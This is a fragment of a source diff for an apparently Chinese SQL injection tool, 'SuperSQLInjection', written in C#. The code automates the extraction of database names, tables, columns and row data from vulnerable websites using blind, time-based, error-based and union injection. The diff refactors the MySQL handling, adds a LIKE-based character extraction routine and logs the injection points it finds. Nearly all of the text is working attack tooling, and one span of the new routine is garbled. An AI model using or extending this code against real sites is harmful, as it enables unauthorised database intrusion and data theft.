getValueByStepUp(MSSQL.getBoolCountBySleep(MSSQL.bool_length.Replace("{data}", data_payload), config.maxTime), 0, 10); - this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为-----:" + len, LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + db_index + "长度为:" + len, LogLevel.info); String value = ""; //获取值 @@ -1313,7 +1287,7 @@ namespace SuperSQLInjection //判断当前数据库长度限制1-50 int len = getValue(payload_len, 1, 50); - this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为-----:" + len,LogLevel.info); + this.Invoke(new showLogDelegate(log), "数据库" + (db_index + 1) + "长度为:" + len,LogLevel.info); //判断当前数据库对应的ascii码 String va_payload = Oracle.bool_value.Replace("{data}", Oracle.db_value.Replace("{index}", oindex.ToString())); @@ -1353,9 +1327,9 @@ namespace SuperSQLInjection { //获取数据库数量 List data_list = new List(); - data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString())); - String db_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Name_data)); + data_list.Add(MySQL.db_value.Replace("{index}", oindex.ToString())); + String db_Name_data = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", db_Name_data)); this.Invoke(new showLogDelegate(log), "数据库" + oindex + "的名称为:" + result,LogLevel.info); this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); } @@ -1419,9 +1393,9 @@ namespace SuperSQLInjection try { List data_list = new List(); - data_list.Add(MySQL5.db_value.Replace("{index}", oindex.ToString())); - String db_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Name_data)); + data_list.Add(MySQL.db_value.Replace("{index}", oindex.ToString())); + String db_Name_data = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", db_Name_data)); this.Invoke(new showLogDelegate(log), "数据库" + oindex + "的名称为:" + result, LogLevel.info); this.Invoke(new addDBToTreeListDelegate(addDBToTreeList), result); } @@ -1491,23 +1465,23 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; int selectIndex = sn.tn.Index; //判断当前表长度 - String data_payload = MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit + ""); + String data_payload = MySQL.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit + ""); int len = 0; if (config.keyType.Equals(KeyType.Time)) { - len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); + len = getValue(MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); } else { - len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50); + len = getValue(MySQL.ver_length.Replace("{data}", data_payload), 1, 50); } //判断当前数据库对应的ascii码 - String va_payload = MySQL5.ver_value.Replace("{data}", data_payload); + String va_payload = MySQL.ver_value.Replace("{data}", data_payload); if (config.keyType.Equals(KeyType.Time)) { - va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value, config.maxTime).Replace("{data}", data_payload); + va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value, config.maxTime).Replace("{data}", data_payload); } String value = ""; @@ -1682,9 +1656,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; List data_list = new List(); - data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); - String tables_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_value_payload)); + data_list.Add(MySQL.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); + String tables_value_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", tables_value_payload)); this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table"); @@ -1727,9 +1701,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; List data_list = new List(); - data_list.Add(MySQL5.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); - String table_value_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", table_value_payload)); + data_list.Add(MySQL.table_value.Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("{index}", sn.limit.ToString())); + String table_value_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", table_value_payload)); this.Invoke(new showLogDelegate(log), "数据库" + sn.dbname + "发现表:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "table"); @@ -1820,6 +1794,43 @@ namespace SuperSQLInjection return newpayload; } + static char[] ss = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9', '_'}; + + + + + /// + /// Like判断 + /// + /// 获取数据Like paylaod + /// 开始值 + /// 最大值 + /// + public String getLikeValue(String payLoadStr) + { + int index = 0; + StringBuilder value = new StringBuilder(); + String startStr = ""; + while (index /// 二分法判断 /// @@ -2093,14 +2104,11 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉Access数据库,不支持错误显示注入!"); break; - case DBType.MySQL4: - MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!"); - break; - case DBType.MySQL5: + case DBType.MySQL: - data_list.Add(MySQL5.dbs_count); - db_Count_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", db_Count_data)); + data_list.Add(MySQL.dbs_count); + db_Count_data = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", db_Count_data)); this.Invoke(new showLogDelegate(log), "报告大侠,我发现了" + result + "个数据库!", LogLevel.info); db_len = Tools.convertToInt(result); this.dbsCount = db_len; @@ -2174,13 +2182,11 @@ namespace SuperSQLInjection { case DBType.Access: break; - case DBType.MySQL4: - break; - case DBType.MySQL5: + case DBType.MySQL: //获取数据库数量 - data_list.Add(MySQL5.dbs_count); - db_Count_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", db_Count_data)); + data_list.Add(MySQL.dbs_count); + db_Count_data = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", db_Count_data)); this.Invoke(new showLogDelegate(log), "报告大侠,我发现了" + result + "个数据库!", LogLevel.info); db_len = Tools.convertToInt(result); @@ -2253,18 +2259,15 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("Access数据库没有库!"); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: //获取数据库数量 if (KeyType.Time.Equals(config.keyType)) { - db_len = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.dbs_count, config.maxTime), 0, 10); + db_len = getValueByStepUp(MySQL.getBoolCountBySleep(MySQL.dbs_count, config.maxTime), 0, 10); } else { - db_len = getValueByStepUp(MySQL5.bool_db_count, 0, 10); + db_len = getValueByStepUp(MySQL.bool_db_count, 0, 10); } this.Invoke(new showLogDelegate(log), "报告大侠,我发现了" + db_len + "个数据库!", LogLevel.info); @@ -2436,19 +2439,16 @@ namespace SuperSQLInjection } checkTablesDic(tn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: //获取当前数据库长度 if (config.keyType.Equals(KeyType.Time)) { - this.tableCount = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), config.maxTime), 0, 50); + this.tableCount = getValueByStepUp(MySQL.getBoolCountBySleep(MySQL.tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), config.maxTime), 0, 50); } else { - this.tableCount = getValueByStepUp(MySQL5.bool_tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), 0, 50); + this.tableCount = getValueByStepUp(MySQL.bool_tables_count.Replace("'{dbname}'", Tools.strToHex(dbname, "UTF-8")), 0, 50); } this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbname + "发现" + this.tableCount + "个表!", LogLevel.info); @@ -2530,14 +2530,11 @@ namespace SuperSQLInjection } checkTablesDic(tn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: //获取当前数据库表数量 - data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); - tables_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", tables_count_payload)); + data_list.Add(MySQL.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); + tables_count_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", tables_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!", LogLevel.info); this.tableCount = Tools.convertToInt(result); @@ -2605,14 +2602,11 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉Access数据库不支持错误显示注入!"); break; - case DBType.MySQL4: - MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!"); - break; - case DBType.MySQL5: + case DBType.MySQL: //获取当前数据库表长度 - data_list.Add(MySQL5.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); - tables_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", tables_count_payload)); + data_list.Add(MySQL.tables_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8"))); + tables_count_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", tables_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,数据库" + dbName + "有" + Tools.convertToInt(result) + "个表!", LogLevel.info); this.tableCount = Tools.convertToInt(result); @@ -2786,23 +2780,23 @@ namespace SuperSQLInjection { SelectNode sn = (SelectNode)osn; //判断当前表长度 - String data_payload = MySQL5.column_value.Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")).Replace("{index}", sn.limit + "").Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")); + String data_payload = MySQL.column_value.Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8")).Replace("{index}", sn.limit + "").Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")); int len = 0; if (KeyType.Time.Equals(config.keyType)) { - len = getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); + len = getValue(MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", data_payload), config.maxTime), 1, 50); } else { - len = getValue(MySQL5.ver_length.Replace("{data}", data_payload), 1, 50); + len = getValue(MySQL.ver_length.Replace("{data}", data_payload), 1, 50); } //判断当前数据库对应的ascii码 - String va_payload = MySQL5.ver_value.Replace("{data}", data_payload); + String va_payload = MySQL.ver_value.Replace("{data}", data_payload); if (KeyType.Time.Equals(config.keyType)) { - va_payload = MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", data_payload), config.maxTime); + va_payload = MySQL.getBoolCountBySleep(MySQL.bool_value.Replace("{data}", data_payload), config.maxTime); } String value = ""; //获取值 @@ -2975,9 +2969,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; //获取数据库数量 List data_list = new List(); - data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); - String column_Name_data = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", column_Name_data)); + data_list.Add(MySQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); + String column_Name_data = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", column_Name_data)); this.Invoke(new showLogDelegate(log), "发现列:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column"); } @@ -3041,9 +3035,9 @@ namespace SuperSQLInjection SelectNode sn = (SelectNode)osn; //获取数据库数量 List data_list = new List(); - data_list.Add(MySQL5.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); - String column_Name_data = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - String result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", column_Name_data)); + data_list.Add(MySQL.column_value.Replace("{index}", sn.limit.ToString()).Replace("'{dbname}'", Tools.strToHex(sn.dbname, "UTF-8")).Replace("'{table}'", Tools.strToHex(sn.tableName, "UTF-8"))); + String column_Name_data = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + String result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", column_Name_data)); this.Invoke(new showLogDelegate(log), "发现列:" + result, LogLevel.info); this.Invoke(new addNodeToTreeListDelegate(addNodeToTreeList), sn.tn, result, "column"); } @@ -3110,18 +3104,15 @@ namespace SuperSQLInjection case DBType.Access: checkColumnsDic(ctn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: if (KeyType.Time.Equals(config.keyType)) { - columns_count = getValueByStepUp(MySQL5.getBoolCountBySleep(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), config.maxTime), 0, 20); + columns_count = getValueByStepUp(MySQL.getBoolCountBySleep(MySQL.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), config.maxTime), 0, 20); } else { - columns_count = getValueByStepUp(MySQL5.bool_columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), 0, 20); + columns_count = getValueByStepUp(MySQL.bool_columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")), 0, 20); } this.Invoke(new showLogDelegate(log), "报告大侠,表" + tableName + "发现" + columns_count + "个列!",LogLevel.info); @@ -3214,13 +3205,10 @@ namespace SuperSQLInjection case DBType.Access: checkColumnsDic(ctn); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: - data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); - columns_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", columns_count_payload)); + case DBType.MySQL: + data_list.Add(MySQL.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); + columns_count_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", columns_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!", LogLevel.info); columns_count = Tools.convertToInt(result); @@ -3302,14 +3290,11 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show("抱歉Access数据库,不支持错误显示注入!"); break; - case DBType.MySQL4: - MessageBox.Show("抱歉MySQL4数据库,不支持错误显示注入!"); - break; - case DBType.MySQL5: + case DBType.MySQL: - data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); - columns_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", columns_count_payload)); + data_list.Add(MySQL.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8"))); + columns_count_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", columns_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!", LogLevel.info); columns_count = Tools.convertToInt(result); @@ -3423,7 +3408,7 @@ namespace SuperSQLInjection GetDataPam gp = (GetDataPam)opam; - String data_payload = MySQL5.data_value.Replace("{dbname}", gp.dbname).Replace("{table}", gp.table).Replace("{limit}", gp.limit + ""); + String data_payload = MySQL.data_value.Replace("{dbname}", gp.dbname).Replace("{table}", gp.table).Replace("{limit}", gp.limit + ""); ListViewItem lvi = null; @@ -3431,28 +3416,28 @@ namespace SuperSQLInjection { //取每一列的值 - String payload_len = MySQL5.ver_length.Replace("{data}", data_payload).Replace("{columns}", columnName); + String payload_len = MySQL.ver_length.Replace("{data}", data_payload).Replace("{columns}", columnName); if (config.keyType.Equals(KeyType.Time)) { - payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName), config.maxTime); + payload_len = MySQL.getBoolCountBySleep(MySQL.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName), config.maxTime); } int len = getValueByStepUp(payload_len, 0, 50); - String va_payload = MySQL5.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName); + String va_payload = MySQL.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName); String colvalue = ""; //获取值 for (int i = 1; i <= len; i++) { - String tmp_va_payload = MySQL5.ord_value.Replace("{data}", data_payload).Replace("{index}", i + "").Replace("{columns}", columnName); - String plen = MySQL5.ver_length.Replace("{data}", tmp_va_payload); + String tmp_va_payload = MySQL.ord_value.Replace("{data}", data_payload).Replace("{index}", i + "").Replace("{columns}", columnName); + String plen = MySQL.ver_length.Replace("{data}", tmp_va_payload); int mu_payload_len = 0; //MySQL多字节ord,先判断ord后的长度,在取每一个的值 if (config.keyType.Equals(KeyType.Time)) { - mu_payload_len = getValue(MySQL5.getBoolCountBySleep(MySQL5.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8); + mu_payload_len = getValue(MySQL.getBoolCountBySleep(MySQL.char_len.Replace("{data}", tmp_va_payload), config.maxTime), 2, 8); } else { @@ -3469,11 +3454,11 @@ namespace SuperSQLInjection int ascii = 0; if (config.keyType.Equals(KeyType.Time)) { - ascii = getValue(MySQL5.getBoolCountBySleep(MySQL5.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9); + ascii = getValue(MySQL.getBoolCountBySleep(MySQL.mid_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 9); } else { - ascii = getValue(MySQL5.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9); + ascii = getValue(MySQL.bool_ord_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 9); } ver_tmp[m_index - 1] = ascii + ""; m_index++; @@ -3807,8 +3792,8 @@ namespace SuperSQLInjection { GetDataPam gp = (GetDataPam)opam; - String datas_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, gp.columns, gp.table, gp.dbname, gp.limit); - String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_value_payload)); + String datas_value_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, gp.columns, gp.table, gp.dbname, gp.limit); + String result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", datas_value_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,获取到第" + (gp.limit + 1) + "行数据", LogLevel.info); String[] datas = Regex.Split(result, "\\$\\$\\$"); @@ -3925,16 +3910,16 @@ namespace SuperSQLInjection { //获取数据长度 - String datas_payload_columns = MySQL5.creatMySQLColumnStr(column); - String datas_payload_length = MySQL5.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)"); + String datas_payload_columns = MySQL.creatMySQLColumnStr(column); + String datas_payload_length = MySQL.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." + gp.table + " limit " + gp.limit + ",1)"); - String d_l_e = MySQL5.creatMySQLColumnStr("(" + datas_payload_length + ")"); - String datas_payload_length_error = MySQL5.error_value.Replace("{data}", d_l_e); + String d_l_e = MySQL.creatMySQLColumnStr("(" + datas_payload_length + ")"); + String datas_payload_length_error = MySQL.error_value.Replace("{data}", d_l_e); String result_length = getOneDataByUnionOrError(datas_payload_length_error); int sumlen = Tools.convertToInt(result_length); - String datas_value_payload = "(select " + MySQL5.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")"; + String datas_value_payload = "(select " + MySQL.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")"; String result = ""; int start = 1; //每次获取长度,err方式有长度限制 @@ -3943,8 +3928,8 @@ namespace SuperSQLInjection while (start < sumlen) { //hex编码,防止中文等乱码 - String datas_value_column = ByPassForBetween(MySQL5.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count); - String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_column); + String datas_value_column = ByPassForBetween(MySQL.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()), count); + String c_datas_value_payload = MySQL.error_value.Replace("{data}", datas_value_column); result += getOneDataByUnionOrError(c_datas_value_payload); start += count; } @@ -4137,18 +4122,15 @@ namespace SuperSQLInjection MessageBox.Show("没有这么多行数据,请改小点!"); } break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: + case DBType.MySQL: if (config.keyType.Equals(KeyType.Time)) { - isMax = findKeyInBody(MySQL5.getBoolCountBySleep(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), config.maxTime), (start + dataCount)); + isMax = findKeyInBody(MySQL.getBoolCountBySleep(MySQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), config.maxTime), (start + dataCount)); } else { - isMax = findKeyInBody(MySQL5.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), (start + dataCount)); + isMax = findKeyInBody(MySQL.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), (start + dataCount)); } if (isMax) @@ -4253,14 +4235,10 @@ namespace SuperSQLInjection case DBType.Access: MessageBox.Show(ErrorMessage.access_no_error_inject_info); break; - case DBType.MySQL4: - MessageBox.Show(ErrorMessage.mysql4_no_error_inject_info); - break; - case DBType.MySQL5: - - data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); - datas_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", datas_count_payload)); + case DBType.MySQL: + data_list.Add(MySQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); + datas_count_payload = MySQL.creatMySQLColumnsStrByError(data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.error_value.Replace("{data}", datas_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success); @@ -4386,13 +4364,10 @@ namespace SuperSQLInjection } stp.WaitForIdle(); break; - case DBType.MySQL4: - - break; - case DBType.MySQL5: - data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); - datas_count_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); - result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_count_payload)); + case DBType.MySQL: + data_list.Add(MySQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table)); + datas_count_payload = MySQL.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, config.unionFill, data_list, null, null, -1); + result = getOneDataByUnionOrError(MySQL.union_value.Replace("{data}", datas_count_payload)); this.Invoke(new showLogDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!", LogLevel.success); @@ -4562,7 +4537,7 @@ namespace SuperSQLInjection public Thread injectThread = null; private void btn_autoInject_Click(object sender, EventArgs e) { - + Tools.getRequestURI(this.txt_inject_request.Text); if (autoinject == 0) { if (config.request.IndexOf("#inject#") != -1) @@ -4629,7 +4604,6 @@ namespace SuperSQLInjection String request = config.request.Replace(data, strparam); ServerInfo oserver = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, "获取原始页面", request, config.timeOut, HTTP.AutoGetEncoding, config.is_foward_302, config.redirectDoGet); - if (!HTTP.AutoGetEncoding.Equals(config.encoding)) { //自定义 @@ -4765,6 +4739,7 @@ namespace SuperSQLInjection { this.Invoke(new showLogDelegate(log), "存在" + pals[2] + "payload:" + pals[0], LogLevel.success); + config.testPayload = pals[0]; selectInjectType(1); //识别数据库 List database_lsit = FileTool.readAllDic("config/database/"); @@ -4856,6 +4831,15 @@ namespace SuperSQLInjection { this.Invoke(new showLogDelegate(log), "报告大侠,没有读取到config/injection/injection.txt注入测试payload!", LogLevel.error); } + //记录注入日志 + if (boolInject) { + config.injectType = InjectType.Bool; + config.request= request.Replace(strparam, newParam); + config.dbType = (DBType)Tools.caseDBTypeInt(currentDB); + config.pname = param.Split('=')[0]; + config.uri = Tools.getRequestURI(request); + logInject(config); + } //错误注入测试 this.Invoke(new showLogDelegate(log), "报告大侠,盲注测试完成,正在进行错误显示注入测试!", LogLevel.info); @@ -4885,6 +4869,7 @@ namespace SuperSQLInjection selectInjectType(2); errorInject = true; newParam = strparam.Replace(param, param + "" + pals[0].Replace(pals[4], "#inject#") + ""); + config.testPayload = pals[0]; unionStartPayLoad = pals[0].Substring(0, pals[0].IndexOf(pals[4])).Replace(" or", " and"); this.Invoke(new showLogDelegate(log), "自动标记错误显示注入完成!", LogLevel.info); break; @@ -4899,14 +4884,24 @@ namespace SuperSQLInjection } this.Invoke(new showLogDelegate(log), "报告大侠,错误显示测试完成,正在进行Union注入测试!", LogLevel.info); - //union注入 - //最大100列 + //记录注入日志 + if (errorInject) + { + config.injectType = InjectType.Error; + config.request = request.Replace(strparam, newParam); + config.dbType = (DBType)Tools.caseDBTypeInt(currentDB); + config.pname = param.Split('=')[0]; + config.uri = Tools.getRequestURI(request); + logInject(config); + } + + //union注入 String payload = ""; if ("SQLServer".Equals(currentDB)) { - payload = unionStartPayLoad + "{payload};--"; + payload = unionStartPayLoad + "{payload}--"; } else if ("MySQL".Equals(currentDB)) @@ -4989,14 +4984,24 @@ namespace SuperSQLInjection } } } - + config.testPayload = unionPayload; } if (isFind) { - + this.Invoke(new showLogDelegate(log), "此注入点支持Union注入,自动选择注入方式完成!", LogLevel.success); } + //记录注入日志 + if (unionInject) + { + config.injectType = InjectType.Union; + config.request = request.Replace(strparam, newParam); + config.dbType = (DBType)Tools.caseDBTypeInt(currentDB); + config.pname = param.Split('=')[0]; + config.uri = Tools.getRequestURI(request); + logInject(config); + } if (boolInject || errorInject || unionInject) { //替换注入位置-标记注入 @@ -5017,6 +5022,38 @@ namespace SuperSQLInjection this.btn_autoInject.Text = "自动识别"; autoinject = 0; } + + public void logInject(Config config) + { + try + { + String savePath = AppDomain.CurrentDomain.BaseDirectory + "/logs/injection/" + config.domain + "/" + config.port + config.uri; + DirectoryInfo dc = new DirectoryInfo(savePath); + dc.Create(); + config.saveConfigpath = dc.FullName + "/" + config.pname + "_" + config.injectType.ToString() + ".xml"; + this.Invoke(new 